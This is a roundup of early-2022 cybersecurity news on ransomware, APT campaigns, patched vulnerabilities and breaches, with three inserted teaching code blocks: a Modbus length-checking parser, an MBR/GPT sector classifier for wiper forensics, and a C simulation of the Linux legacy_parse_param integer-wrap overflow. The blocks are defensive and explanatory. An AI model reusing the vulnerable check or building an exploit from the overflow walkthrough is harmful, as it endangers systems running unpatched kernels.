    Researchers at firmware security company Binarly have discovered 23 vulnerabilities in UEFI firmware code (Insyde's InsydeH2O) used by major device makers. The vulnerabilities could impact millions of enterprise devices, including laptops, servers, routers, and industrial control systems (ICS), across several vendors, including Fujitsu, Siemens, Dell, HP, HPE, Lenovo, Microsoft, Intel and Bull Atos.

    CVSS 9.9-Rated Samba Bug Requires Immediate Patching

    “A critical vulnerability in a popular open-source networking protocol could allow attackers to execute code with root privileges unless patched, experts have warned” (Info Security Magazine, 2022). Samba is an open-source implementation of the SMB protocol that lets Linux, Windows and macOS systems share files across a network. A new critical vulnerability (CVE-2021-44142) has been discovered in the software and has received a CVSS score of 9.9/10, making it one of the more dangerous vulnerabilities disclosed this year. The flaw is an out-of-bounds heap read/write in the vfs_fruit VFS module, which provides macOS (Apple SMB) interoperability; servers that do not load vfs_fruit are not exposed, and the fix shipped in Samba 4.13.17, 4.14.12 and 4.15.5.

    German Petrol Supply Firm Oiltanking Paralyzed by Cyber Attack

    Oiltanking GmbH, a German petrol distributor who supplies Shell gas stations in the country, has fallen victim to a cyberattack that severely impacted its operations. Additionally, the attack has also affected Mabanaft GmbH, an oil supplier. Both entities are subsidiaries of the Marquard & Bahls group, which may have been the breach point.

    CISA Tells Organizations to Patch CVEs Dating Back to 2014

    The US government has added eight more vulnerabilities to its growing list of CVEs that must be patched by federal agencies, including some that first appeared eight years ago. The Cybersecurity and Infrastructure Security Agency (CISA) first launched its Known Exploited Vulnerabilities Catalog in November 2021 as part of a government effort to enhance cyber-resilience.

    Over 20,000 Data Center Management Systems Exposed to Hackers

    Investigators at Cyble have found over 20,000 instances of publicly exposed DCIM systems, including thermal and cooling management dashboards, humidity controllers, UPS controllers, rack monitors, and transfer switches. The analysts were also able to extract passwords from dashboards, which they then used to access database instances stored in the data center. The applications found by Cyble give full remote access to data center assets, provide status reports, and let users configure various system parameters. In most cases the applications used default passwords or were severely outdated, allowing threat actors to compromise them or bypass security layers fairly easily.

    Ukraine Continues to Face Cyber Espionage Attacks from Russian Hackers

    Broadcom-owned Symantec, in a new report published Monday, attributed a continuing series of cyber-espionage attacks on Ukrainian organizations to an actor tracked as Gamaredon (aka Shuckworm or Armageddon), a collective known to be active since at least 2013. In November 2021, Ukrainian intelligence agencies branded the group a "special project" of Russia's Federal Security Service (FSB) and blamed it for carrying out over 5,000 cyberattacks against public authorities and critical infrastructure in the country.

    Muddywater Hacking Group Targets Turkey in New Campaign

    The Iranian-backed MuddyWater hacking group is conducting a new malicious campaign targeting private Turkish organizations and governmental institutions. This cyber-espionage group (aka Mercury, SeedWorm, and TEMP.Zagros) was linked this month to Iran's Ministry of Intelligence and Security (MOIS) by the US Cyber Command (USCYBERCOM).

    Unsecured AWS Server Exposed 3TB in Airport Employee Records

    On Monday, the SafetyDetectives cybersecurity team said the server belonged to Securitas. The Stockholm, Sweden-based company provides on-site guarding, electronic security solutions, enterprise risk management, and fire & safety services. The server contained approximately 3TB of data dating back to 2018, including airport employee records. While security researchers from ‘SafetyDetectives’ were not able to examine every record in the database, four airports were named in exposed files: El Dorado International Airport (COL), Alfonso Bonilla Aragón International Airport (COL), José María Córdova International Airport (COL), and Aeropuerto Internacional Jorge Chávez (PE).

    US Bans Major Chinese Telecom Over National Security Risks

    The Federal Communications Commission (FCC) has revoked the license of China Unicom Americas, the US arm of one of the world's largest mobile service providers, over "serious national security concerns." The move effectively bans the telecom company from providing domestic and international telecommunication services within the United States.

    Conti Ransomware Hits Apple, Tesla Supplier

    The Conti ransomware gang has been linked to an attack on Delta Electronics, a Taiwanese electronics manufacturing company and a major supplier of power components to companies like Apple and Tesla. The attack took place last Friday, January 21, according to a statement the company shared with stock market authorities. Delta, which is primarily known for its power supplies and UPS products, said the attack did not impact its production systems.

    Microsoft Warns of Multi-Stage Phishing Campaign Leveraging Azure Ad

    Microsoft's threat analysts have uncovered a large-scale, multi-phase phishing campaign that uses stolen credentials to register attacker-controlled devices in the target's Azure AD tenant and then uses those devices to distribute further phishing emails from inside the organization. As the report highlights, the attacks succeeded only against accounts that lacked multi-factor authentication (MFA), which made them easier to hijack; enforcing MFA, and restricting which users may register devices in Azure AD, closes this path.

    Conti, DeadBolt Target Delta, QNAP

    Two Taiwanese companies were affected by separate ransomware incidents this week, forcing one to scramble to restore crippled systems and another to push out an emergency update to mitigate attacks on its customers. Delta Electronics, an electronics company that provides products for Apple, Tesla, HP and Dell, disclosed Friday that “non-critical systems” were attacked by “overseas hackers” – an attack that’s been attributed to the Conti Group.

    BlackCat Ransomware Targeting US, European Retail, Construction and Transportation Orgs

    Palo Alto Networks' Unit 42 released a deep-dive into the BlackCat ransomware, which emerged in mid-November 2021 as an innovative ransomware-as-a-service (RaaS) group leveraging the Rust programming language and offering affiliates 80-90% of ransom payments. In December, the ransomware family, also known as ALPHV, racked up at least 10 victims, giving it the seventh-largest number of victims listed on their leak site among ransomware groups tracked by Unit 42.

    QNAP Devices Targeted in Ransomware Attack

    QNAP Systems, Inc. is a Taiwanese company that specializes in network-attached storage (NAS) equipment for applications such as file sharing, virtualization, storage management, and surveillance. The DeadBolt ransomware operation is encrypting QNAP NAS systems around the globe, claiming to exploit a zero-day vulnerability in the devices' firmware to do so. When the attacks began, QNAP customers discovered that their files had been encrypted and that the .deadbolt extension had been appended to their file names.

    German Govt Warns of APT27 Hackers Backdooring Business Networks

    Germany's domestic intelligence agency (BfV) warns that the China-linked APT27 group is actively targeting German commercial organizations, using the HyperBro remote access trojan (RAT) to backdoor their networks. In an earlier campaign attributed to the same group by Palo Alto Networks researchers, the attackers compromised at least nine organizations from critical sectors worldwide, including defense, healthcare, energy, technology, and education.

    VMware Urges Customers to Patch VMware Horizon Servers Against Log4j Attacks

    “VMware urges customers to patch critical Log4j security vulnerabilities impacting Internet-exposed VMware Horizon servers targeted in ongoing attacks” (Security Affairs, 2022). Shodan scans show tens of thousands of VMware Horizon servers currently exposed to attack. Most recently, the Night Sky ransomware group has been exploiting Log4Shell (CVE-2021-44228) in vulnerable VMware Horizon systems. VMware addressed Log4Shell with Horizon releases 2111, 7.13.1, and 7.10.3, but many systems remain unpatched.

    LockBit Ransomware is Now Targeting Linux

    One of the most prolific families of ransomware now has additional Linux and VMware ESXi variants that have been spotted actively targeting organisations in recent months. Analysis by cybersecurity researchers at Trend Micro identified LockBit Linux-ESXi Locker version 1.0 being advertised on an underground forum. Previously, LockBit ransomware, which at one point last year was by far the most active ransomware family, was focused on Windows.

    Latest Version of Android RAT BRATA Wipes Devices After Stealing Data

    The new version of the BRATA Android malware supports new features, including GPS tracking and a functionality to perform a factory reset on the device. First discovered by Kaspersky in 2019, BRATA’s name comes from the phrase “Brazilian RAT Android.” The RAT has been spreading via WhatsApp, SMS messages, and through the official Google Play Store.

    Multiple Cisco Products Snort Modbus Denial of Service Vulnerability

    A vulnerability in the Modbus preprocessor of the Snort detection engine could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an integer overflow while processing Modbus traffic. An attacker could exploit this vulnerability by sending crafted Modbus traffic through an affected device. A successful exploit could allow the attacker to cause the Snort process to hang, causing traffic inspection to stop.
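    An inspection engine that trusts a length field from the wire before checking it is how a parser ends up hung, and a hung inspector means traffic flows uninspected. The block below is an added example, not Snort's preprocessor code and not a reconstruction of the Cisco defect: it shows the bounds checks a Modbus/TCP decoder has to make on the MBAP length field before using it, with a fail-safe wrapper that returns a drop verdict instead of raising. The frames at the bottom are constructed.

```python
"""Parse Modbus/TCP ADUs from a TCP payload with the length field checked
before it is used.

Added example, not Snort's preprocessor code and not a reconstruction of the
Cisco bug; it illustrates the class of check. The frames at the bottom are
constructed.
"""
import struct

MBAP_HEADER = 7          # transaction id(2) + protocol id(2) + length(2) + unit id(1)
MAX_LENGTH_FIELD = 254   # unit id + 253-byte PDU, the Modbus/TCP maximum


class ModbusFrameError(ValueError):
    pass


def parse_adus(payload):
    """Split one TCP payload into ADUs; raise ModbusFrameError on any inconsistency."""
    frames, off = [], 0
    while off < len(payload):
        if len(payload) - off < MBAP_HEADER:
            raise ModbusFrameError("truncated MBAP header")
        tid, pid, length, unit = struct.unpack_from(">HHHB", payload, off)
        if pid != 0:
            raise ModbusFrameError("protocol id %d is not Modbus" % pid)
        # 'length' counts the unit id plus the PDU, and the PDU needs at least
        # a function code. Computing 'length - 1' on an unsigned value before
        # this check is exactly the kind of arithmetic that wraps.
        if length < 2:
            raise ModbusFrameError("length field %d too small" % length)
        if length > MAX_LENGTH_FIELD:
            raise ModbusFrameError("length field %d exceeds the Modbus/TCP maximum" % length)
        end = off + 6 + length
        if end > len(payload):
            raise ModbusFrameError("length field claims %d bytes, only %d present"
                                   % (6 + length, len(payload) - off))
        pdu = payload[off + 7:end]
        frames.append({"tid": tid, "unit": unit, "function": pdu[0], "data": bytes(pdu[1:])})
        off = end
    return frames


def decode_read_request(frame):
    """Decode a Read Holding/Input Registers request (functions 3 and 4)."""
    if frame["function"] not in (3, 4):
        raise ModbusFrameError("not a register read request")
    if len(frame["data"]) != 4:
        raise ModbusFrameError("register read needs exactly 4 data bytes")
    start, quantity = struct.unpack(">HH", frame["data"])
    if not 1 <= quantity <= 125:
        raise ModbusFrameError("quantity %d outside 1..125" % quantity)
    return {"start": start, "quantity": quantity}


def check_payload(payload):
    """Return ("ok", frames) or ("drop", reason) so an inspector can fail safe."""
    try:
        return "ok", parse_adus(payload)
    except ModbusFrameError as e:
        return "drop", str(e)


# Constructed frames (hex, big-endian as on the wire).
GOOD = bytes.fromhex("0001 0000 0006 01 03 0000 000A")       # read 10 holding registers
ZERO_LEN = bytes.fromhex("0002 0000 0000 01")                 # length 0: no PDU at all
OVERSIZED = bytes.fromhex("0003 0000 FFFF 01 03 0000 0001")   # claims 65535 bytes
TRUNCATED = bytes.fromhex("0004 0000 0006 01 03 0000")        # header promises 12 bytes, 10 sent

if __name__ == "__main__":
    for name, pkt in (("GOOD", GOOD), ("ZERO_LEN", ZERO_LEN),
                      ("OVERSIZED", OVERSIZED), ("TRUNCATED", TRUNCATED)):
        print(name, check_payload(pkt))
```

    The important property is that every branch terminates: a bad length produces a verdict, never a loop that waits for bytes that will not arrive. When you wire a decoder like this into an inspection path, decide explicitly whether a drop verdict fails open or closed for the control network behind it.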

    Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets

    Researchers from Trellix, the company formed by the merger of McAfee Enterprise and FireEye, found that attackers exploited the MSHTML remote code execution flaw to spy on government and defense targets. Trellix attributed the attacks with moderate confidence to the Russia-based APT28 group (also known as Fancy Bear), based on similarities in source code, attack indicators and geopolitical objectives.

    Staff Negligence Is Now a Major Reason for Insider Security Incidents

    According to Proofpoint's 2022 Cost of Insider Threats Global report, published on Tuesday, insider threats now cost organizations $15.4 million annually, an increase of 34% over 2020 estimates. The report, conducted by the Ponemon Institute, includes survey responses from over 1,000 IT professionals worldwide, all of whom have experienced a recent cybersecurity incident caused by an insider threat.

    US Adds 17 Exploited Bugs to "Must Patch" List

    The US government's cybersecurity agency, CISA, has added 17 vulnerabilities currently being actively exploited in the wild to the database of bugs that federal agencies must fix. The Known Exploited Vulnerabilities Catalog was launched in November last year under Binding Operational Directive (BOD) 22-01, which is designed to make civilian federal government agencies more cyber-resilient.

    Researchers Break Down WhisperGate Wiper Malware Used in Ukraine Website Defacement

    Cisco Talos says that two wipers are used in WhisperGate attacks. The first wiper attempts to destroy the master boot record (MBR) and to eradicate any recovery options. "Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten," the researchers say. However, with many modern systems now moving to GUID Partition Tables (GPTs), this executable may not be successful – and so an additional wipe has been included in the attack chain.
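    For the responder, the first question after a WhisperGate-style incident is what LBA 0 now contains and whether the disk was GPT, since on a GPT disk LBA 0 only holds a protective MBR and the real partition table starts at LBA 1, which is why the first-stage wipe may leave such a system bootable. The block below is an added example, not code from Cisco Talos: it parses a 512-byte first sector and classifies it as a legacy MBR, a GPT protective MBR, or a sector with no valid boot signature. The sectors at the bottom are constructed.

```python
"""Classify the first sector of a disk image: legacy MBR, GPT protective MBR,
or a sector that no longer carries a valid boot signature.

Added example, not code from Cisco Talos. The sectors at the bottom are
constructed with the build_sector helper.
"""
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = 0xAA55          # bytes 55 AA at offset 510, read little-endian
PARTITION_TABLE_OFFSET = 446
GPT_PROTECTIVE_TYPE = 0xEE
ENTRY_FMT = "<B3xB3xII"          # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector):
    """Return boot-signature validity, boot-code emptiness and the four partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected one %d-byte sector" % SECTOR_SIZE)
    entries = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        status, ptype, lba_start, count = struct.unpack_from(ENTRY_FMT, sector, off)
        entries.append({"bootable": status == 0x80, "type": ptype,
                        "lba_start": lba_start, "sectors": count})
    return {
        "signature_ok": struct.unpack_from("<H", sector, 510)[0] == BOOT_SIGNATURE,
        "bootcode_empty": not any(sector[:PARTITION_TABLE_OFFSET]),
        "partitions": entries,
    }


def classify(sector):
    """Return 'invalid', 'gpt-protective', 'legacy-mbr' or 'empty-table'."""
    info = parse_mbr(sector)
    if not info["signature_ok"]:
        return "invalid"            # overwritten, or never a boot sector
    used = [p for p in info["partitions"] if p["type"] != 0]
    if (len(used) == 1 and used[0]["type"] == GPT_PROTECTIVE_TYPE
            and used[0]["lba_start"] == 1):
        return "gpt-protective"     # GPT header is at LBA 1; inspect it separately
    if used:
        return "legacy-mbr"
    return "empty-table"


def build_sector(bootcode, entries):
    """Assemble a sector from boot code and (status, type, lba_start, count) tuples."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(bootcode)] = bootcode
    for i, (status, ptype, lba_start, count) in enumerate(entries):
        struct.pack_into(ENTRY_FMT, sector, PARTITION_TABLE_OFFSET + 16 * i,
                         status, ptype, lba_start, count)
    struct.pack_into("<H", sector, 510, BOOT_SIGNATURE)
    return bytes(sector)


# Constructed sectors.
LEGACY = build_sector(b"\xfa\x33\xc0", [(0x80, 0x07, 2048, 204800)])      # one NTFS partition
PROTECTIVE = build_sector(b"", [(0x00, GPT_PROTECTIVE_TYPE, 1, 0xFFFFFFFF)])  # GPT disk
WIPED = (b"Your hard drive has been corrupted.\n" * 16)[:SECTOR_SIZE]       # note text, no 55 AA

if __name__ == "__main__":
    for name, sec in (("LEGACY", LEGACY), ("PROTECTIVE", PROTECTIVE), ("WIPED", WIPED)):
        print(name, classify(sec), parse_mbr(sec)["bootcode_empty"])
```

    On a live image, read the first 512 bytes of the raw device (not a partition) and pass them in; if the result is "invalid" on a disk that classifies as GPT from its LBA 1 header, the MBR-only stage of the wiper is what you are looking at, and the GPT partition entries deserve their own integrity check.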

    Investigating APT36 or Earth Karkaddan’s Attack Chain and Malware Arsenal

    APT36, also known as Earth Karkaddan, a politically motivated advanced persistent threat (APT) group, has historically targeted Indian military and diplomatic resources. This APT group (also referred to as Operation C-Major, PROJECTM, Mythic Leopard, and Transparent Tribe) has been known to use social engineering and phishing lures as an entry point, after which, it deploys the Crimson RAT malware to steal information from its victims.

    F5 Fixes 25 Flaws in BIG-IP, BIG-IQ, and NGINX Products

    F5 announced security patches for 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products. Most of the vulnerabilities (23) affect the BIG-IP application delivery controller (ADC), and 13 of them are rated high severity (CVSS score 7.5). The issues received CVE identifiers from CVE-2022-23010 to CVE-2022-23032.

    FBI Warns of Malicious QR Used to Steal Your Money

    The Federal Bureau of Investigation (FBI) warned Americans this week that cybercriminals are using maliciously crafted Quick Response (QR) codes to steal their credentials and financial info. The warning was issued as a public service announcement (PSA) published on the Bureau's Internet Crime Complaint Center (IC3) earlier this week.

    FBI Warning: Diavol Ransomware Makes Demands of up to $500,000, TrickBot Links

    The FBI found that the Diavol ransomware uses the same method to fingerprint victim machines as TrickBot and the TrickBot-related Anchor DNS malware: "TrickBot's tools include the Anchor_DNS backdoor, a tool for transmitting data between victim machines and TrickBot-controlled servers using Domain Name System (DNS) tunneling to hide malicious traffic with normal DNS traffic."

    Linux Kernel Privilege Escalation Bug Found and Fixed

    "To exploit it requires the CAP_SYS_ADMIN privilege to be enabled. If that's the case, an unprivileged local user can open a filesystem that does not support the File System Context application programming interface (API). In this situation, it drops back to legacy handling, and from there, the flaw can escalate an attacker's system privileges" (SecList, 2022). "Researchers discovered a heap overflow bug in the legacy_parse_param in the Linux kernel's fs/fs_context.c program. This parameter is used in Linux filesystems during superblock creation for mount and superblock reconfiguration for a remount. The superblock records all of a filesystem's characteristics such as file size, block size, empty and filled storage blocks. So, yeah, it's important."
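
    The bug class behind this kernel flaw is worth seeing in code. The following is an added C example, not code from the page or from the kernel: it reproduces in user space the length check from legacy_parse_param as it stood before the fix and as the fix rewrote it (the check `len > PAGE_SIZE - 2 - size` became `size + len + 2 > PAGE_SIZE`; I am relying on my recollection of the upstream patch here), and simulates the option-accumulation loop with bookkeeping only, so nothing is actually overwritten. The page size is assumed to be 4096 bytes. One caveat on the quoted requirement: CAP_SYS_ADMIN is needed only inside a user namespace, which unprivileged users can create on distributions where that is enabled, so "unprivileged" really does mean unprivileged on many systems.

```c
#include <stddef.h>
#include <stdio.h>

/* Page size assumed for the demonstration; the kernel uses PAGE_SIZE. */
#define DEMO_PAGE_SIZE 4096UL

/*
 * Bound check as it stood in legacy_parse_param() before the fix.
 * `size` is the number of bytes already accumulated in the one-page
 * legacy options buffer, `len` the length of the next "key=value" option.
 * Returns 1 if the option is refused. Because every operand is unsigned,
 * PAGE_SIZE - 2 - size wraps to a huge value once size > PAGE_SIZE - 2,
 * and the comparison then accepts any length.
 */
static int vulnerable_rejects(unsigned int size, size_t len)
{
	return len > DEMO_PAGE_SIZE - 2 - size;
}

/* The corrected check (the upstream fix): the same condition written
 * without subtraction, so it cannot wrap. */
static int fixed_rejects(unsigned int size, size_t len)
{
	return size + len + 2 > DEMO_PAGE_SIZE;
}

/*
 * Simulate the accumulation loop. Each accepted option accounts for a
 * leading ',' plus len bytes, and a NUL is placed at index `size` after
 * it. Returns the highest index the loop would write, or -1 if an option
 * was refused. Pure bookkeeping: no buffer is touched, so the demo cannot
 * itself overflow.
 */
static long max_index_written(const size_t *lens, size_t n, int use_fixed)
{
	unsigned int size = 0;
	long max_idx = -1;

	for (size_t i = 0; i < n; i++) {
		int reject = use_fixed ? fixed_rejects(size, lens[i])
		                       : vulnerable_rejects(size, lens[i]);
		if (reject)
			return -1;
		size += 1 + (unsigned int)lens[i];  /* ',' then key[=value] */
		max_idx = (long)size;               /* NUL terminator lands here */
	}
	return max_idx;
}

/* Constructed input: the first option fills the page to PAGE_SIZE - 1
 * bytes, which both checks allow; the second must be refused. */
static const size_t DEMO_LENS[] = { DEMO_PAGE_SIZE - 2, 100 };

static long overflow_demo(int use_fixed)
{
	return max_index_written(DEMO_LENS, 2, use_fixed);
}

int main(void)
{
	printf("vulnerable check: highest index written = %ld (page ends at %lu)\n",
	       overflow_demo(0), DEMO_PAGE_SIZE - 1);
	printf("fixed check:      highest index written = %ld (-1 = refused)\n",
	       overflow_demo(1));
	return 0;
}
```

    The first option is accepted by both checks and leaves `size` at 4095. With the vulnerable check the right-hand side of the comparison then wraps, the 100-byte second option is accepted, and the loop would write out to index 4196 of a 4096-byte allocation; the fixed check refuses it.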

    WordPress Plugin Flaw Puts Users of 20,000 Sites at Phishing Risk

    A high-severity bug in the WordPress Email Template Designer WP HTML Mail, installed in more than 20,000 websites, can lead to code injection and the distribution of persuasive phishing emails. WordPress WP HTML Mail is a plugin for creating tailored emails, contact form alerts, and other custom messages digital platforms send to their customers. WP HTML Mail is compatible with WooCommerce, Ninja Forms, BuddyPress, and other popular WordPress plugins. Even though the number of websites that use it is small, many of them have large audiences, causing the vulnerability to affect numerous users.

    ‘Anomalous’ Spyware Targets Industrial Companies

    Several spyware campaigns have come to light in a new report. Researchers call these attacks "Anomalous." The targets are industrial enterprises, and the goals are theft of email account credentials, financial fraud, and even resale of the spyware to other attackers. Kaspersky researchers noted that the operators used various spyware strains and rotated them after short periods, most likely so that a variant blocked by an endpoint product on a targeted machine could be replaced with one that evades detection.

    McAfee Agent Bug Lets Hackers Run Code with Windows SYSTEM privileges

    McAfee has patched a security vulnerability discovered in the company's McAfee Agent software for Windows enabling attackers to escalate privileges and execute arbitrary code with SYSTEM privileges. McAfee Agent is a client-side component of McAfee ePolicy Orchestrator (McAfee ePO) that downloads and enforces endpoint policies and deploys antivirus signatures, upgrades, patches, and new products on enterprise endpoints.

    New White Rabbit Ransomware Linked to FIN8 Hacking Group

    A new ransomware family called 'White Rabbit' appeared in the wild recently and, according to recent research findings, could be a side operation of the FIN8 hacking group. FIN8 is a financially motivated actor that has targeted financial organizations for several years, primarily by deploying point-of-sale (POS) malware that steals credit card details (Bleeping Computer, 2022). Researchers from Trend Micro analyzed a sample of White Rabbit obtained from an attack on a US bank in December 2021. The ransomware executable is a small file of about 100 KB that only runs when the correct password is supplied, a technique also used by other ransomware strains including Egregor, MegaCortex, and SamSam.

    Ransomware: 2,300+ Local Governments, Schools, Healthcare Providers Impacted in 2021

    More than 2,300 local governments, schools, and healthcare organizations in the US were affected by ransomware attacks in 2021, according to a new report from security company Emsisoft. The company found that at least 77 state and municipal governments, 1,043 schools, and 1,203 healthcare providers were impacted by a ransomware incident last year. The attacks also led to 118 data breaches, exposing troves of sensitive information.

    Joint Law Enforcement Action Takes Down VPN Service

    An international law enforcement collaboration has targeted the users and infrastructure of VPNLab.net, rendering it no longer available. The action was taken in response to the use of the VPN provider's service to support cybercrime activities, including ransomware deployment (Info Security Magazine, 2022). Ten national law enforcement agencies coordinated the takedown, including those of Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the US and the UK, and 15 servers hosted by VPNLab[.]net were seized. VPNLab was popular with cybercriminals for setting up infrastructure and communications for ransomware campaigns and was frequently advertised on the dark web. During the investigation, law enforcement identified over 100 businesses at risk of cyberattacks and is working with them to mitigate those risks.

    Office 365 Phishing Attack Impersonates the US Department of Labor

    A new phishing campaign impersonating the United States Department of Labor lures recipients with invitations to submit bids in order to steal Office 365 credentials. The campaign has been ongoing for at least a couple of months and uses over ten different phishing sites impersonating the agency. Some emails are sent from spoofed addresses that appear to come from the actual Department of Labor (DoL) domain, while others come from a set of newly registered look-alike domains such as dol-gov[.]com, dol-gov[.]us and bids-dolgov[.]us. Most of the emails pass through abused servers owned by non-profit organizations to evade email security blocks.

    New Moonbounce UEFI Malware Used by APT41 in Targeted Attacks

    Security analysts have discovered and linked MoonBounce, "the most advanced" UEFI firmware implant found in the wild so far, to the Chinese-speaking APT41 hacker group (also known as Winnti). APT41 is a notorious hacking group that has been active for at least a decade and is primarily known for its stealthy cyber-espionage operations against high-profile organizations from various industry sectors.

    UEFI Malware Used by APT41 in Targeted Attacks

    BIOS and UEFI attacks are not new by any means, but according to security researchers APT41 (also known as Winnti), a Chinese-speaking state-sponsored group, has produced the most complex implant of its kind seen to date. MoonBounce is written into the SPI flash chip on the computer's motherboard (logic board), the chip that holds the UEFI firmware. The same kind of flash memory is used for storage in phones, tablets and media players, and in industrial equipment such as security systems and medical devices. Flash is non-volatile: it can be electrically erased and reprogrammed, but its contents survive power-off, which is why an implant placed there outlives a disk wipe or an operating system reinstall.

    Defending Users’ NAS Devices From Evolving Threats

    Threats to the internet of things (IoT) continue to evolve as users and businesses grow increasingly reliant on these devices for constant connectivity, access to information and data, and workflow continuity. Cybercriminals have taken notice of this dependence and now regularly update their tools and routines to add network-attached storage (NAS) devices to their list of targets, knowing full well that homes and businesses rely on these devices for storing and backing up files. More importantly, cybercriminals are aware that these devices hold valuable information and often have only minimal security measures.

    SolarWinds Serv-U Bug Exploited for Log4j Attacks

    While exploitation of this vulnerability remains highly limited, it could be adopted by other threat actors. While I would normally rank this as a low severity incident, the popularity of Serv-U should be taken into consideration; hence, I would treat this as Medium. There is still some disagreement about the exploitation Microsoft observed; we will continue to update on the situation.

    RRD Suffers Data Theft in a Conti Ransomware Attack

    R.R. Donnelley is a Fortune 500 integrated communications corporation based in the United States that offers marketing and business communications, commercial printing, and other associated services. The company’s corporate offices are in Chicago, Illinois, in the United States. R.R. Donnelley was the world’s largest commercial printer in 2007.

    Red Cross Suffers Massive Cyber Attack

    The international humanitarian organization Red Cross announced yesterday that it had been the victim of a massive cyberattack that resulted in the theft of confidential information for over 515,000 “very vulnerable people” participating in the “Restoring Family Links” program.

    Former DHS Official Charged with Stealing Govt Employees' PII

    A former Department of Homeland Security acting inspector general pleaded guilty today to stealing confidential and proprietary software and sensitive databases from the US government containing employees' personal identifying information (PII). 61-year-old Charles Kumar Edwards coordinated the scheme while working for DHS-OIG (Department of Homeland Security, Office of Inspector General) as an employee and acting IG between February 2008 and December 2013.

    FCC Wants New Data Breach Reporting Rules for Telecom Carriers

    The Federal Communications Commission (FCC) has proposed more rigorous data breach reporting requirements for telecom carriers in response to breaches that recently hit the telecommunications industry. On Wednesday, Chairwoman Jessica Rosenworcel shared the proposal in the form of a Notice of Proposed Rulemaking (NPRM), the first step in changing the FCC's rules for alerting federal agencies and customers of data breaches.

    A 'Massive' Hacking Attack Has Hit Government Websites in Ukraine

    A 'massive' cyberattack has taken down several government websites in Ukraine, including those of the Foreign Ministry and the Ministry of Education and Science. The attack occurred overnight between Thursday and Friday morning and took down more than a dozen official websites, disrupting government work and raising questions about whether Russia was signaling that a new offensive against Ukraine was getting underway. A statement by Ukrainian police says the attackers left "provocative messages" on the main pages of government websites, which have been taken offline, but that no personal data was altered or stolen.

    Cisco Releases Patch for Critical Bug Affecting Unified CCMP and Unified CCDM

    Cisco Systems has rolled out security updates for a critical security vulnerability affecting Unified Contact Center Management Portal (Unified CCMP) and Unified Contact Center Domain Manager (Unified CCDM) that could be exploited by a remote attacker to take control of an affected system. Tracked as CVE-2022-20658, the vulnerability has been rated 9.6 in severity on the CVSS scoring system, and concerns a privilege escalation flaw arising out of a lack of server-side validation of user permissions that could be weaponized to create rogue Administrator accounts by submitting a crafted HTTP request.

    Free Unofficial Patch for Windows ‘RemotePotato0’ Now Available

    An unofficial patch has been released for a privilege escalation vulnerability affecting all versions of Windows, after Microsoft tagged it "won't fix". The flaw, located in the Windows RPC protocol, was dubbed RemotePotato0 by its discoverers, Antonio Cocomazzi of SentinelLABS and independent researcher Andrea Pierini, who disclosed it in April last year. If successfully exploited, threat actors could perform an NTLM relay attack that gives them domain admin privileges.

    US Links MuddyWater Hacking Group to Iranian Intelligence Agency

    US Cyber Command (USCYBERCOM) has officially linked the Iranian-backed MuddyWater hacking group to Iran's Ministry of Intelligence and Security (MOIS). MOIS is the Iranian government's leading intelligence agency, tasked with coordinating the country's intelligence and counterintelligence, as well as covert actions supporting the Islamic regime's goals beyond Iran's borders.

    KCodes NetUSB Flaw Impacts Millions of SOHO Routers

    Cybersecurity researchers from SentinelOne have discovered a critical vulnerability (CVE-2021-45608) in KCodes NetUSB component that is present in millions of end-user routers from different vendors, including Netgear, TP-Link, Tenda, EDiMAX, D-Link, and Western Digital.

    Jail’s Inability to Deal With Cyberattack Could Violate the Constitutional Rights of Inmates

    A prison in New Mexico had an unplanned lockdown due to a ransomware attack. As reported by Source NM, the Metropolitan Detention Center in Bernalillo County, New Mexico, went into lockdown on January 5, 2022, after cyberattackers infiltrated Bernalillo County systems and deployed malware. Inmates were made to stay in their cells as the ransomware outbreak reportedly not only knocked out the establishment's internet but also locked staff out of data management servers and security camera networks.

    Microsoft RDP Bug Enables Data Theft, Smart-Card Hijacking

    Microsoft Windows systems going back to at least Windows Server 2012 R2 are affected by a vulnerability in the Remote Desktop Services protocol that gives attackers, connected to a remote system via RDP, a way to gain file system access on the machines of other connected users. Threat actors that exploit the flaw can view and modify clipboard data or impersonate the identities of other users logged in to the machine in order to escalate privileges or to move laterally on the network, researchers from CyberArk discovered recently. They reported the issue to Microsoft, which issued a patch for the flaw (CVE-2022-21893) in its security update for January this Tuesday.

    First Patch Tuesday of 2022 Brings Fix for a Critical 'Wormable' Windows Vulnerability

    Of the 96 vulnerabilities, nine are rated Critical and 89 are rated Important in severity, with six zero-days publicly known at the time of release. This is in addition to 29 issues patched in Microsoft Edge on January 6, 2022. None of the disclosed bugs are listed as under attack. The patches cover a swath of the computing giant's portfolio, including Microsoft Windows and Windows components, Exchange Server, Microsoft Office and Office components, SharePoint Server, .NET Framework, Microsoft Dynamics, open-source software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).

    KCodes NetUSB Kernel Remote Code Execution Flaw Impacts Millions of Devices

    A high-impact vulnerability allowing remote code execution has impacted millions of end-user router devices. On Tuesday, SentinelOne published an analysis of the bug, tracked as CVE-2021-45608 and deemed critical by the research team. The vulnerability impacts the KCodes NetUSB kernel module. KCodes solutions are licensed by numerous hardware vendors to provide USB over IP functionality in products including routers, printers, and flash storage devices.

    Extortion DDoS Attacks Grow Stronger And More Common

    In the fourth quarter of last year, about a quarter of Cloudflare's customers that were the target of a DDoS attack said that they received a ransom note from the perpetrator. A large portion of these attacks occurred in December 2021, when almost a third of Cloudflare customers reported receiving a ransom letter. By comparison with the previous month, the number of reported DDoS ransom attacks was double, Cloudflare says in a blog post today.

    Four Million Outdated log4j Downloads Were Served from Apache Maven Central

    There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks.

